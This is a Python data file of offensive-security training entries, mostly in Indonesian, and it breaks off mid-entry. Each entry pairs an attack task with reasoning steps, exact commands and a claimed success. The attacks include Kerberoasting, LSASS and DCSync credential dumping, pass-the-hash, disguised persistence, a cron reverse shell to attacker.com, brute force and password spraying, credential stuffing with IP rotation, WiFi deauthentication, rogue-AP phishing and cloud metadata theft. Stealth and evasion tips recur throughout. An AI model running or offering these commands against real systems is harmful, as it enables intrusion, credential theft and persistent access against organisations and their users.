"""PART2: REASONING entries 101-200"""
from ds_part1 import _e

REASONING_DATA_2 = [
    # ── POST_EXPLOIT continued (101-120) ──────────────────────────────────────
    _e("kerberoasting attack untuk extract service account hashes dari Active Directory",
       ["kerberoasting = request Kerberos TGS untuk SPN accounts",
        "SPN accounts sering memiliki weak password",
        "impacket-GetUserSPNs untuk enumerate dan request TGS tickets",
        "hashcat -m 13100 untuk crack TGS tickets offline"],
       ["impacket-GetUserSPNs domain.local/user:pass -dc-ip 192.168.1.1 -request -outputfile hashes.txt",
        "hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt",
        "crackmapexec smb 192.168.1.0/24 -u svc_account -p cracked_pass"],
       ["spn_enum","tgs_request","offline_crack","lateral_move"],
       [("impacket","Kerberos TGS ticket request"),("hashcat","offline password cracking")],
       "TGS crack bisa lama — gunakan rules (-r best64.rule) untuk meningkatkan hit rate",
       "svc_sql SPN ditemukan, TGS hash extracted",
       "Active Directory attacker",
       "Kerberoasting: impacket-GetUserSPNs domain.local/user:pass -request -outputfile hashes.txt"),

    _e("bloodhound untuk mapping attack path di Active Directory",
       ["bloodhound = graph-based AD attack path analysis",
        "sharphound/bloodhound-python sebagai collector data",
        "upload data ke bloodhound GUI untuk visualisasi attack paths",
        "query: Shortest Path to Domain Admin dari current user"],
       ["bloodhound-python -u user -p pass -d domain.local -c All -dc 192.168.1.1",
        "upload hasil JSON ke BloodHound GUI",
        "query Cypher untuk shortest path ke Domain Admins"],
       ["data_collect","graph_upload","attack_path_query","plan_path"],
       [("bloodhound-python","AD data collection"),("bloodhound","AD attack path visualization")],
       "BloodHound query butuh GUI — pastikan neo4j dan bloodhound service running",
       "domain.local — 3 attack paths ke Domain Admin ditemukan via svc_sql",
       "Active Directory pentester",
       "BloodHound collection: bloodhound-python -u user -p pass -d domain.local -c All"),

    _e("dump LSASS untuk extract credentials dari Windows memory",
       ["LSASS = Local Security Authority Subsystem, menyimpan credentials in-memory",
        "mimikatz sekurlsa::logonpasswords untuk dump credentials",
        "Credential Guard membuat NTLM hash tidak readable — check dulu",
        "alternatives: comsvcs.dll dump, Task Manager, procdump untuk bypass EDR"],
       ["mimikatz # sekurlsa::logonpasswords",
        "comsvcs.dll method: rundll32 C:\\Windows\\System32\\comsvcs.dll MiniDump LSASS_PID lsass.dmp full",
        "remote dump: impacket-lsadump domain.local/admin:pass @10.0.0.10"],
       ["lsass_identify","dump_execute","parse_credentials","offline_extract"],
       [("mimikatz","Windows credential extraction"),("impacket","remote LSASS dump")],
       "Credential Guard aktif = NTLM hash tidak available — fallback ke ticket extraction",
       "Windows Server 2019 — mimikatz berhasil: 3 domain user hashes + cleartext password",
       "credential harvester",
       "LSASS dump: mimikatz sekurlsa::logonpasswords → domain admin cleartext found!"),

    _e("DCSync attack untuk replikasi semua domain hashes dari DC",
       ["DCSync = simulate domain controller replication untuk dapatkan semua password hashes",
        "prerequisite: DS-Replication-Get-Changes-All permission",
        "impacket-secretsdump untuk remote DCSync",
        "hasil: semua NTLM hashes termasuk krbtgt untuk golden ticket"],
       ["impacket-secretsdump domain.local/admin:pass@192.168.1.1 -just-dc",
        "mimikatz # lsadump::dcsync /domain:domain.local /all /csv",
        "hashcat -m 1000 all_hashes.txt rockyou.txt (crack NT hashes)"],
       ["perm_verify","dcsync_execute","hash_extract","krbtgt_obtain"],
       [("impacket","DCSync via secretsdump"),("mimikatz","local DCSync execution")],
       "krbtgt hash = bisa buat Golden Ticket — persistence total pada AD",
       "domain.local — DCSync berhasil: 500 user hashes + krbtgt hash obtained",
       "domain persistence specialist",
       "DCSync: impacket-secretsdump admin@DC → all hashes dumped including krbtgt!"),

    _e("Pass-the-Hash attack untuk lateral movement tanpa cleartext password",
       ["PtH = gunakan NTLM hash langsung tanpa crack",
        "crackmapexec, evil-winrm, impacket semua mendukung PtH",
        "format: -H NTLM_HASH atau LM:NTLM",
        "PtH tidak works untuk services yang require Kerberos"],
       ["crackmapexec smb 10.0.0.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:NTLMHASH'",
        "evil-winrm -i 10.0.0.10 -u Administrator -H NTLMHASH",
        "impacket-wmiexec -hashes :NTLMHASH administrator@10.0.0.10"],
       ["hash_obtain","pth_smb","pth_winrm","pth_wmi"],
       [("crackmapexec","PtH via SMB"),("evil-winrm","PtH via WinRM"),
        ("impacket","PtH via WMI")],
       "PtH works untuk local administrator accounts — domain accounts butuh Kerberos",
       "NTLM hash administrator → PtH ke 12 machines, 4 Domain Controllers",
       "PtH lateral movement specialist",
       "Pass-the-Hash: cme smb 10.0.0.0/24 -u Admin -H NTLMHASH → 12 pwned!"),

    _e("establish persistence via scheduled task pada Windows target",
       ["persistence = mekanisme untuk maintain access setelah reboot",
        "scheduled task adalah persistence method yang umum dan flexible",
        "schtasks untuk create task yang run payload setiap boot/login",
        "blend dalam: gunakan nama yang mirip legitimate task"],
       ["schtasks /create /sc onlogon /tn 'WindowsUpdate' /tr 'C:\\Windows\\Temp\\payload.exe' /ru SYSTEM",
        "schtasks /query /fo LIST /v | grep WindowsUpdate (verify creation)",
        "registry alternative: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"],
       ["task_create","task_verify","registry_alternative","stealth_naming"],
       [("schtasks","Windows scheduled task management"),
        ("reg","Windows registry manipulation")],
       "scheduled task dengan nama mirip legitimate = harder to detect manual review",
       "Windows target — persistence via schtasks 'WindowsUpdate' running payload setiap boot",
       "persistence specialist",
       "Persistence: schtasks /create /sc onlogon /tn 'WindowsUpdate' /tr payload.exe"),

    _e("Linux privilege escalation via sudo misconfig",
       ["sudo -l untuk lihat allowed commands",
        "GTFOBins untuk find PE via allowed sudo commands",
        "common: vim, less, find, awk, nmap, python semuanya bisa PE",
        "sudo ALL = root langsung"],
       ["sudo -l",
        "jika (ALL) NOPASSWD: /usr/bin/find: sudo find / -exec /bin/sh \\; -quit",
        "jika (ALL) python: sudo python3 -c 'import os; os.system(\"/bin/bash\")'",
        "jika (ALL) vim: sudo vim -c ':!/bin/bash'"],
       ["sudo_check","gtfobins_lookup","pe_execute","root_confirm"],
       [("sudo","privilege elevation via sudo"),("gtfobins","PE via common binaries")],
       "GTFOBins adalah reference wajib — hampir semua binary bisa PE jika ada sudo access",
       "Linux target — sudo /usr/bin/find allowed NOPASSWD → root via find -exec",
       "Linux PE analyst",
       "Sudo PE: sudo -l → find NOPASSWD! sudo find / -exec /bin/sh \\; → root!"),

    _e("exfiltrate data dari compromised host via DNS tunneling",
       ["DNS tunneling = encode data dalam DNS queries untuk bypass firewall",
        "berguna ketika hanya DNS traffic yang diallow keluar",
        "dnscat2 untuk command and control via DNS",
        "iodine untuk network tunnel via DNS"],
       ["dnscat2-server domain.example.com (di attacker server)",
        "dnscat2-client domain.example.com (di target)",
        "cat sensitive_file.txt | xxd | base64 → encode ke DNS queries manual"],
       ["server_setup","client_connect","data_encode","exfil_execute"],
       [("dnscat2","DNS-based command and control"),("iodine","DNS tunnel for network access")],
       "DNS tunneling lambat — hanya untuk kecil file atau command channel",
       "compromised host — dnscat2 tunnel established, credentials.txt exfiltrated via DNS",
       "data exfiltration specialist",
       "DNS tunnel: dnscat2-server → target connecting... tunnel established. Exfil via DNS."),

    _e("install backdoor via malicious cron job pada Linux server",
       ["cron job persistence = payload dieksekusi sesuai schedule",
        "user crontab: crontab -e, atau /etc/cron.d/ jika root",
        "reverse shell every minute untuk reliable persistent access",
        "blend in: gunakan schedule yang realistic bukan * * * * *"],
       ["crontab -e → tambah: */5 * * * * /tmp/.update.sh",
        "echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' > /tmp/.update.sh",
        "chmod +x /tmp/.update.sh (make executable)"],
       ["cron_add","payload_create","permission_set","test_trigger"],
       [("crontab","Linux scheduled task persistence")],
       "hidden file (.update.sh) dan 5-minute interval lebih stealthy dari every minute",
       "Linux server — cron backdoor di /tmp/.update.sh, reverse shell tiap 5 menit",
       "Linux persistence analyst",
       "Cron persistence: */5 * * * * /tmp/.update.sh → reverse shell tiap 5 menit"),

    _e("privilege escalation via writable service binary pada Windows",
       ["service yang jalankan binary yang bisa kita overwrite = PE ke service privilege",
        "accesschk untuk check service binary permissions",
        "overwrite binary dengan payload, restart service = RCE sebagai SYSTEM",
        "sc qc [service] untuk check service configuration"],
       ["accesschk.exe -uwcqv * /accepteula (find writable services)",
        "sc qc vulnerable_svc (check binary path)",
        "copy malicious.exe 'C:\\Program Files\\vulnerable_svc\\svc.exe'",
        "sc stop vulnerable_svc && sc start vulnerable_svc"],
       ["service_enum","writable_check","binary_replace","service_restart"],
       [("accesschk","Windows permission checker"),("sc","service control manager")],
       "service restart butuh permission atau reboot — check jika bisa trigger restart",
       "Windows target — vulnerable_svc binary writable by Users, overwrite → SYSTEM shell",
       "Windows service PE specialist",
       "Writable service: accesschk → vulnerable_svc writable! Replacing binary → restart → SYSTEM"),

    # ── BRUTE_FORCE (121-135) ─────────────────────────────────────────────────
    _e("brute force SSH login pada server 10.0.0.20",
       ["SSH brute force → risiko lockout: cek account lockout policy dulu",
        "hydra lebih cepat untuk SSH dengan paralel connections",
        "mulai dengan common usernames: root, admin, ubuntu, pi",
        "rate limit: -t 4 untuk 4 thread, hindari trigger fail2ban"],
       ["hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.0.20 ssh -t 4 -V",
        "hydra -L top-usernames.txt -P top-passwords.txt 10.0.0.20 ssh",
        "medusa -h 10.0.0.20 -u root -P rockyou.txt -M ssh"],
       ["policy_check","wordlist_select","brute_execute","session_establish"],
       [("hydra","fast network login cracker"),("medusa","parallel brute force")],
       "fail2ban biasanya block setelah 5-10 attempt — pertimbangkan slow scan mode",
       "10.0.0.20 SSH — root:password123 ditemukan setelah 2340 attempts",
       "credential attacker",
       "SSH brute force: hydra -l root -P rockyou.txt 10.0.0.20 ssh -t 4"),

    _e("password spray pada Office 365 dengan kerbrute",
       ["password spray = satu password ke banyak user, hindari lockout",
        "kerbrute untuk Kerberos pre-auth testing",
        "gunakan password musiman: Company2024!, Winter2024!, Welcome1",
        "pastikan hanya spray 1-2 attempt per user per hari"],
       ["kerbrute passwordspray -d domain.com user_list.txt 'Company2024!' --dc 10.0.0.1",
        "o365spray --spray -U users.txt -p 'Company2024!' --domain company.com",
        "monitor: jangan exceed lockout threshold"],
       ["user_enum","password_select","spray_execute","valid_cred_collect"],
       [("kerbrute","Kerberos-based password spray"),("o365spray","Office 365 spray tool")],
       "koordinasikan dengan blue team tentang lockout threshold sebelum spray",
       "domain.com — 3 dari 150 user valid dengan Company2024!",
       "credential tester",
       "Password spray: kerbrute passwordspray -d domain.com users.txt 'Company2024!'"),

    _e("crack hash MD5 dari database dump",
       ["MD5 = weak hash, rainbow table attack sangat efektif",
        "hashcat mode 0 untuk MD5",
        "coba rockyou.txt dulu sebelum rules",
        "john dengan rules juga efektif untuk common password patterns"],
       ["hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt",
        "hashcat -m 0 -a 0 hashes.txt rockyou.txt -r best64.rule",
        "john --format=raw-md5 --wordlist=rockyou.txt hashes.txt"],
       ["hash_identify","wordlist_attack","rule_attack","result_collect"],
       [("hashcat","GPU-accelerated password cracker"),("john","CPU-based password cracker")],
       "best64.rule meningkatkan crack rate 3-5x dibanding pure wordlist attack",
       "150 MD5 hashes — 89 cracked dengan rockyou + best64 rule",
       "password cracker",
       "MD5 crack: hashcat -m 0 hashes.txt rockyou.txt -r best64.rule"),

    _e("brute force RDP login menggunakan crowbar",
       ["RDP brute force lebih lambat dari SSH karena handshake overhead",
        "crowbar mendukung RDP dengan multiple threads",
        "ncrack sebagai alternatif untuk RDP",
        "account lockout policy di Windows harus diperhatikan: default 5 attempts"],
       ["nmap -sV -p 3389 target.com (verify RDP open)",
        "crowbar -b rdp -s 10.0.0.50/32 -u administrator -C passwords.txt -t 5",
        "hydra -l administrator -P passwords.txt 10.0.0.50 rdp -t 1 -V"],
       ["rdp_verify","brute_execute","session_connect"],
       [("crowbar","RDP brute force tool"),("hydra","RDP brute force alternative")],
       "RDP NLA enabled = brute force masih works tapi butuh valid domain user dulu",
       "10.0.0.50 RDP — administrator:Welcome2024 ditemukan setelah 350 attempts",
       "RDP brute force specialist",
       "RDP brute: crowbar -b rdp -s 10.0.0.50/32 -u administrator → Welcome2024 found!"),

    _e("brute force ZIP archive password dengan john the ripper",
       ["ZIP archive encryption = common CTF scenario",
        "zip2john untuk extract hash dari ZIP file",
        "john dengan mode incremental atau wordlist untuk crack",
        "hashcat -m 13600 untuk PKZIP, -m 17200 untuk newer ZIP"],
       ["zip2john archive.zip > zip.hash",
        "john zip.hash --wordlist=rockyou.txt",
        "hashcat -m 13600 zip.hash rockyou.txt"],
       ["hash_extract","wordlist_crack","incremental_fallback"],
       [("zip2john","ZIP hash extraction"),("john","ZIP password cracking"),
        ("hashcat","GPU ZIP cracking")],
       "encrypted ZIP vs plain ZIP dengan password = berbeda format hash",
       "CTF archive.zip — password 'qwerty123' ditemukan dengan john + rockyou",
       "archive cracker",
       "ZIP crack: zip2john archive.zip → john → qwerty123 found! Archive unlocked."),

    _e("credential stuffing attack menggunakan combolists yang leaked",
       ["credential stuffing = test leaked email:password combo pada target service",
        "bukan brute force — test kredensial yang sudah diketahui",
        "spray via API login endpoint dengan rate limiting yang longgar",
        "gunakan hanya untuk authorized test atau IR investigation"],
       ["ffuf -w combolist.txt:COMBO -u https://target.com/api/login -X POST -d 'email=EMAIL&pass=PASS' -mc 200",
        "python3 credential_stuffer.py --combo combolist.txt --target https://target.com/login",
        "filter: 200 = success, 401 = invalid, 429 = rate limited"],
       ["combolist_prepare","api_identify","stuff_execute","valid_collect"],
       [("ffuf","fast web fuzzer untuk credential stuffing"),
        ("python","custom credential stuffing script")],
       "rate limiting bypass: rotate IP dengan Tor atau proxy pool",
       "target.com — 12 dari 1000 combo valid: credential reuse dari breach data",
       "credential stuffing analyst",
       "Cred stuffing: ffuf dengan combo list → 12/1000 valid (1.2% hit rate)"),

    _e("online hash cracking menggunakan crackstation dan hashes.com",
       ["online rainbow tables untuk quick hash lookup tanpa compute",
        "crackstation.net: 15 billion entries lookup",
        "hashes.com: distributed cracking community",
        "gunakan dulu online tools sebelum local GPU — jauh lebih cepat untuk common hashes"],
       ["submit hash ke crackstation.net (web UI atau API)",
        "hashes.com untuk hashes yang tidak di crackstation",
        "jika tidak found: hashcat local dengan GPU",
        "hashid untuk identify type sebelum submit ke tool yang tepat"],
       ["online_lookup","type_identify","local_fallback"],
       [("crackstation","online rainbow table lookup"),
        ("hashes.com","community distributed cracking"),
        ("hashcat","local GPU fallback")],
       "MD5 dan NTLM sering ada di online rainbow table — check online dulu sebelum GPU",
       "5 hashes: 4 found di crackstation dalam <1 detik, 1 butuh hashcat GPU 3 jam",
       "hash cracking analyst",
       "Online lookup: crackstation.net → 4/5 hashes cracked instantly! 1 remaining untuk GPU."),

    _e("brute force FTP credentials menggunakan medusa",
       ["FTP brute force dengan medusa untuk parallel testing",
        "common FTP users: admin, ftp, anonymous, ftpuser, backup",
        "anonymous login check dulu sebelum brute force",
        "medusa lebih stabil untuk FTP dari hydra pada beberapa server"],
       ["medusa -h 10.0.0.50 -u admin -P rockyou.txt -M ftp -t 10",
        "medusa -H ftp_hosts.txt -C default_ftp_creds.txt -M ftp",
        "hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.50"],
       ["anon_check","common_user_brute","parallel_brute"],
       [("medusa","parallel FTP brute force"),("hydra","FTP credential testing")],
       "FTP dengan SSL (FTPS) butuh medusa dengan SSL flag: -M ftp -O ssl=enable",
       "10.0.0.50 FTP — ftpuser:ftpuser123 ditemukan, writable directory discovered",
       "FTP brute force specialist",
       "FTP brute: medusa -h 10.0.0.50 -u ftpuser -P rockyou.txt -M ftp → ftpuser123!"),

    _e("crack bcrypt password hashes dari web application database dump",
       ["bcrypt = adaptive hash, deliberately slow untuk resist brute force",
        "hashcat -m 3200 untuk bcrypt, tapi sangat lambat",
        "john dengan --incremental terlalu lambat untuk bcrypt",
        "strategy: custom wordlist dari target (username, company, domain), hybrid rules"],
       ["hashcat -m 3200 bcrypt_hashes.txt custom_wordlist.txt --rules=best64.rule",
        "generate custom wordlist dari target info: company name, domain, product names",
        "john --format=bcrypt --wordlist=custom.txt hashes.txt",
        "pertimbangkan: cloud GPU (vast.ai) untuk cost-effective cracking"],
       ["hash_identify","custom_wordlist","rule_based","cloud_gpu"],
       [("hashcat","bcrypt cracking dengan GPU"),("john","CPU-based bcrypt cracking")],
       "bcrypt cost factor 12+ = sangat lambat bahkan dengan GPU — prioritaskan custom wordlist",
       "250 bcrypt hashes — 8 cracked dalam 24 jam dengan custom wordlist + GPU",
       "advanced hash cracker",
       "Bcrypt crack: hashcat -m 3200 → 8/250 cracked (24h GPU). Custom wordlist essential."),

    _e("HTTP basic auth brute force dengan burpsuite intruder",
       ["HTTP Basic Auth = base64 encoded credentials dalam Authorization header",
        "burpsuite intruder untuk automated credential testing",
        "payload position: Authorization: Basic BASE64(user:pass)",
        "cluster bomb attack untuk username + password combination"],
       ["burpsuite: capture request dengan Authorization header",
        "intruder → cluster bomb → payload 1=usernames, payload 2=passwords",
        "base64 encode setiap kombinasi: echo -n 'user:pass' | base64",
        "filter response: 200 = success, 401 = fail"],
       ["capture_request","intruder_setup","payload_config","filter_success"],
       [("burpsuite","HTTP intruder untuk brute force automation")],
       "Basic auth tidak ada lockout di banyak implementation — brute force aman lebih agresif",
       "admin panel — admin:admin123 ditemukan via burpsuite intruder (1500 attempts)",
       "HTTP auth brute force analyst",
       "Burpsuite intruder: cluster bomb → admin:admin123 found! 200 OK response."),

    _e("SNMP community string brute force dengan onesixtyone",
       ["SNMP community string = semacam password untuk akses SNMP",
        "default strings: public, private, community, network, read",
        "onesixtyone lebih cepat dari hydra untuk SNMP bruteforce",
        "jika berhasil: snmpwalk untuk extract system info, user accounts, network config"],
       ["onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.0.0.0/24",
        "snmpwalk -v2c -c public 10.0.0.50 (full system walk)",
        "snmpwalk -v2c -c public 10.0.0.50 1.3.6.1.4.1.77.1.2.25 (Windows users OID)"],
       ["community_brute","snmp_walk","user_extract","network_map"],
       [("onesixtyone","SNMP community string brute force"),
        ("snmpwalk","SNMP data extraction")],
       "SNMP v3 menggunakan auth yang lebih kuat — v1/v2c dengan community string adalah legacy",
       "10.0.0.0/24 — 5 devices SNMP v2c dengan 'public', Windows users dan network config exposed",
       "SNMP brute force analyst",
       "SNMP brute: onesixtyone → 5 devices respond to 'public'! snmpwalk extracting data..."),

    _e("brute force WPA Enterprise (WPA-EAP) dengan hostapd-wpe",
       ["WPA Enterprise menggunakan 802.1X auth dengan RADIUS server",
        "hostapd-wpe membuat rogue AP untuk capture EAP credentials",
        "EAP-PEAP/MSCHAPV2 = password bisa di-crack offline dari captured handshake",
        "asleap untuk crack NetNTLMv2 hash dari EAP capture"],
       ["hostapd-wpe wpe.conf (setup rogue AP identical SSID)",
        "tunggu client connect dan capture EAP handshake",
        "asleap -r wpe.log -W rockyou.txt (crack captured hash)",
        "atau: eaphammer --creds --interface wlan0 --essid 'TargetWiFi' --wpa-version 2 --auth wpa-eap"],
       ["rogue_ap_setup","client_capture","hash_extract","offline_crack"],
       [("hostapd-wpe","WPA Enterprise rogue AP for credential capture"),
        ("asleap","EAP credential cracking"),("eaphammer","WPA Enterprise attack framework")],
       "WPA Enterprise capture = domain credentials — lebih valuable dari WPA2-PSK",
       "TargetWiFi WPA-EAP — 3 clients connected ke rogue AP, domain credentials captured",
       "wireless credential attacker",
       "WPA-EAP attack: hostapd-wpe rogue AP → 3 clients connected, creds captured → asleap cracking"),

    _e("subdomain takeover hunting menggunakan subjack dan nuclei",
       ["subdomain takeover = subdomain pointing ke unclaimed service",
        "CNAME ke dangling resource = bisa claim service dan serve content",
        "subjack untuk automated takeover detection",
        "vulnerable services: GitHub Pages, Heroku, Netlify, AWS S3, Azure"],
       ["subfinder -d target.com -o subs.txt",
        "subjack -w subs.txt -t 100 -o results.txt -ssl",
        "nuclei -l subs.txt -t nuclei-templates/takeovers/ -o takeovers.txt"],
       ["subdomain_collect","takeover_scan","verify_manual","claim_service"],
       [("subjack","subdomain takeover scanner"),
        ("nuclei","takeover template scanning")],
       "verify manual sebelum report — false positive rate cukup tinggi pada takeover tools",
       "target.com — staging.target.com CNAME ke unclaimed GitHub Pages, takeover possible",
       "subdomain takeover analyst",
       "Takeover hunt: subjack + nuclei → staging.target.com vulnerable! GitHub Pages unclaimed."),

    _e("WiFi deauthentication attack untuk disconnect clients dari AP",
       ["deauth attack = kirim spoofed deauth frame ke client/AP",
        "berguna untuk: force reconnect → capture handshake, denial of service",
        "aireplay-ng -0 untuk deauth",
        "CATATAN: hanya pada authorized network testing"],
       ["airmon-ng start wlan0",
        "airodump-ng wlan0mon (identify target AP dan clients)",
        "aireplay-ng -0 10 -a BSSID -c CLIENT_MAC wlan0mon (deauth specific client)",
        "atau: aireplay-ng -0 0 -a BSSID wlan0mon (broadcast deauth semua klien)"],
       ["monitor_mode","target_identify","client_deauth","broadcast_deauth"],
       [("aireplay-ng","wireless frame injection tool"),
        ("airodump-ng","wireless packet capture")],
       "broadcast deauth (-c broadcast) sangat mengganggu — gunakan targeted deauth",
       "authorized WiFi pentest — deauth 3 clients, handshake captured untuk offline crack",
       "wireless attack specialist",
       "WiFi deauth: aireplay-ng -0 10 -a BSSID -c CLIENT → disconnected, handshake captured!"),

    # ── WIRELESS (135-150) ────────────────────────────────────────────────────
    _e("capture WPA2 handshake dari network WiFi target",
       ["WPA2 handshake = 4-way handshake saat client connect ke AP",
        "airodump untuk capture, aireplay untuk deauth",
        "interface harus dalam monitor mode dulu",
        "deauth mempercepat handshake capture"],
       ["airmon-ng start wlan0",
        "airodump-ng wlan0mon -c 6 -w capture --bssid AA:BB:CC:DD:EE:FF",
        "aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon",
        "aircrack-ng capture-01.cap -w rockyou.txt"],
       ["monitor_mode","capture","deauth","handshake_wait","offline_crack"],
       [("airmon-ng","monitor mode"),("airodump-ng","packet capture"),
        ("aireplay-ng","deauth"),("aircrack-ng","handshake cracking")],
       "deauth terlalu agresif bisa terdeteksi IDS — 5 packet cukup",
       "SSID: TargetWiFi, handshake captured ch.6",
       "wireless security tester",
       "Monitor mode aktif. Capturing handshake: airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF"),

    _e("bettercap ARP spoofing untuk MITM pada network 192.168.0.0/24",
       ["ARP spoofing = poison ARP table agar traffic melewati attacker machine",
        "bettercap lebih modern dari ettercap",
        "aktifkan IP forwarding agar traffic tetap mengalir ke tujuan asli",
        "net.sniff untuk capture credentials dari unencrypted traffic"],
       ["echo 1 > /proc/sys/net/ipv4/ip_forward",
        "bettercap -iface eth0","net.probe on",
        "set arp.spoof.targets 192.168.0.1,192.168.0.50",
        "arp.spoof on","net.sniff on"],
       ["ip_forward","network_probe","arp_poison","traffic_capture"],
       [("bettercap","network MITM framework")],
       "HTTPS HSTS menghalangi sslstrip — fokus pada cleartext protocol",
       "192.168.0.50 → traffic passing through attacker, HTTP credentials visible",
       "network MITM analyst",
       "ARP spoofing aktif. Bettercap targeting 192.168.0.50 via 192.168.0.1"),

    _e("crack WPA3 menggunakan dragonblood vulnerability",
       ["WPA3 Dragonblood = side-channel attack pada SAE handshake",
        "timing dan cache-based oracles untuk recover password",
        "dragonslayer tool mengimplementasi dragonblood attack",
        "memerlukan adaptive multi-message attack untuk full exploit"],
       ["python3 dragonslayer.py -i wlan0 -t TARGET_BSSID -l wordlist.txt",
        "timing oracle: analyze response timing untuk leak password info",
        "combine dengan dictionary: guiding attack based on timing leaks"],
       ["timing_oracle","sae_attack","offline_recover"],
       [("dragonslayer","WPA3 Dragonblood implementation"),
        ("airmon-ng","monitor mode setup")],
       "Dragonblood sudah di-patch di sebagian besar modern firmware — check dulu WPA3 version",
       "WPA3 AP — Dragonblood timing oracle confirmed, password narrowed ke 200 candidates",
       "WPA3 security researcher",
       "Dragonblood: dragonslayer.py → timing oracle aktif, 200 password candidates remaining"),

    _e("wifi phishing attack menggunakan wifiphisher",
       ["wifiphisher = rogue AP + captive portal untuk capture WiFi credentials",
        "clone target AP, jam legitimate AP, client reconnect ke evil AP",
        "show captive portal asking untuk re-enter WiFi password",
        "credential dikirim ke attacker server"],
       ["wifiphisher -aI wlan0 -eI wlan1 --essid TargetWiFi --phishing-pages firmware-upgrade",
        "customize phishing page untuk lebih meyakinkan",
        "monitor: wifiphisher log untuk captured credentials"],
       ["ap_clone","legitimate_jam","rogue_serve","credential_capture"],
       [("wifiphisher","WiFi phishing platform")],
       "authorized test only — wifiphisher sangat effective tapi highly visible",
       "authorized WiFi pentest — 2/5 users submit credentials ke fake firmware upgrade page",
       "wireless social engineering specialist",
       "WiFi phish: wifiphisher → cloning TargetWiFi → 2 users submitted password to firmware page"),

    _e("scan semua WiFi networks dalam range dan assess security",
       ["WiFi survey = discover semua AP, assess encryption, find open networks",
        "kismet untuk comprehensive passive WiFi monitoring",
        "airodump untuk quick survey dengan detail",
        "output: SSID, BSSID, channel, encryption, power, clients"],
       ["kismet (passive monitoring mode, tidak inject)",
        "airodump-ng wlan0mon (quick survey)",
        "nmcli dev wifi list (simple alternative)",
        "wash -i wlan0mon (WPS enabled AP detection)"],
       ["interface_setup","passive_survey","wps_check","result_analyze"],
       [("kismet","comprehensive wireless network monitor"),
        ("airodump-ng","active WiFi survey"),("wash","WPS detection tool")],
       "WPS enabled = Pixie Dust attack atau online PIN brute force attack possible",
       "WiFi survey — 15 APs: 1 open, 8 WPA2, 3 WPA3, 3 WPS enabled",
       "wireless survey analyst",
       "WiFi survey: airodump-ng → 15 APs found, 1 open, 3 WPS enabled (reaver target)"),

    _e("exploit WPS PIN menggunakan reaver untuk WPA2 network",
       ["WPS = WiFi Protected Setup, PIN dapat di-brute-force via Pixie Dust atau online",
        "Pixie Dust: offline attack, works pada banyak router",
        "Online WPS brute: 11000 combinations maksimum karena checksum",
        "reaver atau bully untuk WPS exploitation"],
       ["wash -i wlan0mon (identify WPS enabled APs)",
        "reaver -i wlan0mon -b BSSID -vvv -N (online brute force)",
        "pixiewps -e E-HASH1 -f E-HASH2 -s E-NONCE (offline Pixie Dust)",
        "bully -b BSSID -v 3 wlan0mon (bully alternative)"],
       ["wps_identify","pixie_dust_attempt","online_brute_fallback"],
       [("reaver","WPS PIN brute force tool"),("bully","WPS attack alternative"),
        ("pixiewps","WPS Pixie Dust attack")],
       "Pixie Dust works pada banyak Broadcom/Realtek chips — try Pixie Dust dulu sebelum online",
       "TargetWiFi WPS — Pixie Dust berhasil dalam 10 detik, WPA2 PSK recovered",
       "WPS exploit specialist",
       "WPS exploit: Pixie Dust reaver -i wlan0mon -b BSSID --pixie-dust → PSK recovered!"),

    # ── CLOUD (151-165) ────────────────────────────────────────────────────────
    _e("audit security posture AWS account menggunakan prowler",
       ["prowler = automated AWS security audit tool (CIS benchmark based)",
        "butuh AWS credentials dengan ReadOnly permissions minimal",
        "cek semua region, bukan hanya us-east-1",
        "fokus pada: public S3, open security groups, IAM misconfig, CloudTrail"],
       ["prowler aws -M html -f us-east-1 -o prowler_report",
        "prowler aws -c check11,check12,check13 (specific checks)",
        "aws s3 ls --recursive s3:// untuk enumerate public buckets"],
       ["cred_setup","full_audit","s3_check","iam_audit","report_gen"],
       [("prowler","AWS CIS benchmark security audit"),("aws CLI","AWS resource enumeration")],
       "jalankan per region karena beberapa resource bersifat regional",
       "AWS account — 3 public S3 buckets, 2 security groups open 0.0.0.0/0",
       "cloud security auditor",
       "AWS audit dimulai. prowler aws -M html -o prowler_report"),

    _e("enumerate AWS IAM permissions dengan pacu untuk privilege escalation",
       ["pacu = AWS exploitation framework",
        "mulai dengan whoami: cek current identity dan permissions",
        "enumerate semua permissions untuk identify PE paths",
        "common PE: iam:PutUserPolicy, iam:AttachUserPolicy, lambda:CreateFunction"],
       ["pacu","run iam__enum_permissions",
        "run iam__privesc_scan","run s3__enum_bucket_data"],
       ["identity_check","perm_enum","pe_scan","data_access"],
       [("pacu","AWS exploitation dan privilege escalation framework")],
       "pacu module log semua action — review sebelum run untuk minimize CloudTrail noise",
       "AWS IAM user — iam:CreatePolicyVersion tersedia → PE via malicious policy version",
       "cloud penetration tester",
       "Pacu loaded. Enumerating IAM: run iam__enum_permissions"),

    _e("cari secret credentials yang ter-hardcode di GitHub repository",
       ["secret scanning = cari API keys, passwords, tokens di source code",
        "trufflehog untuk scan git history",
        "gitleaks untuk real-time scan dan CI/CD integration",
        "false positive tinggi — verify manual setiap temuan"],
       ["trufflehog git https://github.com/company/repo.git",
        "gitleaks detect --source . --report-path report.json",
        "trufflehog github --org company untuk scan semua repo organisasi"],
       ["repo_clone","history_scan","pattern_match","verify_valid","report"],
       [("trufflehog","git history secret scanning"),
        ("gitleaks","source code secret detection")],
       "expired credentials masih penting untuk report — bukti hygiene buruk",
       "company/repo — AWS key ditemukan di commit 3 bulan lalu",
       "secret hunter",
       "Secret scan: trufflehog git https://github.com/company/repo.git"),

    _e("eksploitasi IMDSv1 untuk steal EC2 instance credentials",
       ["IMDSv1 = Instance Metadata Service tanpa session token = vulnerable",
        "via SSRF pada web app yang jalan di EC2",
        "endpoint: http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "credentials yang di-steal: AccessKey, SecretKey, SessionToken (temporary)"],
       ["test SSRF: kirim request ke 169.254.169.254",
        "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ (list roles)",
